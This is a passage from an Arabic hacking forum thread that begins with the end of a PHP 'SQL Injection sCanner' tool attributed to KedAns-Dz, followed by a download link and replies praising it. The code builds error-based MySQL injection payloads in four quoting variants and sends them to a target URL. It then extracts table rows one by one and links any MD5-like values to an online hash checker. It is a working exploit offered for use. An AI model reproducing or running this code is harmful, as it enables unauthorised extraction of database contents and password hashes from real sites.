        echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
        echo "<input type=\"submit\" name=\"datas\" id=\"datas\" value=\"data\"/>";
        echo "<form>";
    
    
        
    }
    
    
        }
    function frame4(){
        html_header();
        
    if(isset($_POST['datas']) && $_POST['datas']=='data')
    {
        $url = $_POST["url"];
        $num3 = $_POST["num2"];
        $dz = $_POST["dz"];
        
        $mode_eb = $_POST["lol"];
    
    
    if($mode_eb==1){
     @$datas = "$url+%27%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }elseif($mode_eb==2){
     @$datas = "$url+%27%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb==3){
     @$datas = "$url+%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb==4){
    @$datas = "$url+%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
    
    
    
    
    @$dato = @file_get_contents("$datas");
    
    
    
    
        $i = -1;
        
        echo "<table>";
        
        while ($i <= (GetBetween($dato)-1)):
                if($mode_eb == 1){
        @$_data = "%27%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
        }elseif($mode_eb == 2){
                     
                @$_data = "%27%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
        }elseif($mode_eb == 3){
                @$_data = "%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
        }elseif($mode_eb == 4){
                @$_data = "%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
        }
            
        $datas2 = "$url+$_data";
        $data2 = file_get_contents("$datas2");
        $num4 = GetBetween($data2);
        if(strlen($num4) == 32){
        echo "<tr><td>$num4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$num4')\" style=\"color: blue\">MD5</div></td></tr>";
        }else{
        echo "<tr><td>$num4</td><td>";
        }
        $i++;
        endwhile;
        
     //}
    
    
    echo "</table>";
    echo "<table border=0 width=400 align=center><tr><Td><center><p style='font-size: 10pt;'>";
    echo "<b>KedAns-Dz | 1337day.com * dis9.com | Made in Algeria</br></b></td></tr>";
    echo "</center>";
    }
    }
    
    
    /*
    
    
    Copycenter (.) | KedAns-Dz | (Inj3ct0r 1337day.com | Dis9 UE dis9.com)
    
    
    ... Algeria - Hassi messaoud (30500) in 20/02/2012 - 22:34 ...
    
    
    */
    ?>
    *=== تحديد كود ===*
    تحميل السكربت

    http://www.gulfup.com/?5egqT3


     

    الملفات المرفقة:

  2. Al-JoKeR مساعد مشرف

    الأنتساب:
    ‏22 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    رد: PHP SQL Injection sCanner

    Thank you
    Good topic
     
  3. speeedh Developer

    الأنتساب:
    ‏21 مارس 2012
    المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: PHP SQL Injection sCanner

    يعطيك الف عافيه
    ما قصرت &:":​
     
  4. Đѓ.Đ4řķ Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    49
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    .♥ آلسعودية ♥.
    رد: PHP SQL Injection sCanner

    يعطيك العافية

    مجهود رائع



    :{1}:
     
  5. иαѕѕєя Active DeveloPer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    80
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    موضف صيانة
    الإقامة:
    الأردن
    رد: PHP SQL Injection sCanner

    يعيطك العاافيه​
     
  6. ملك الهكر 07 Developer

    الأنتساب:
    ‏5 يوليو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: PHP SQL Injection sCanner

    عوافي يابطل ​
     
  7. خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: PHP SQL Injection sCanner

    الله يعطيك العافيه
    :{1}:
    واصل حبيبي
    &:":​



     
  8. خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: PHP SQL Injection sCanner

    تم تقيمك
    [FONT=Arial, tahoma, sans-serif]&:":[/FONT]​



     
  9. vŀяύš V • I • P

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: PHP SQL Injection sCanner

    تسلم ايدك يا اخى​
     
  10. яσ¢к нα¢кєя Developer

    الأنتساب:
    ‏24 مارس 2012
    المشاركات:
    67
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    Taif
    رد: PHP SQL Injection sCanner

    بارك الله فيكـ اخوي علي وماقصرت يالغالي ..
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة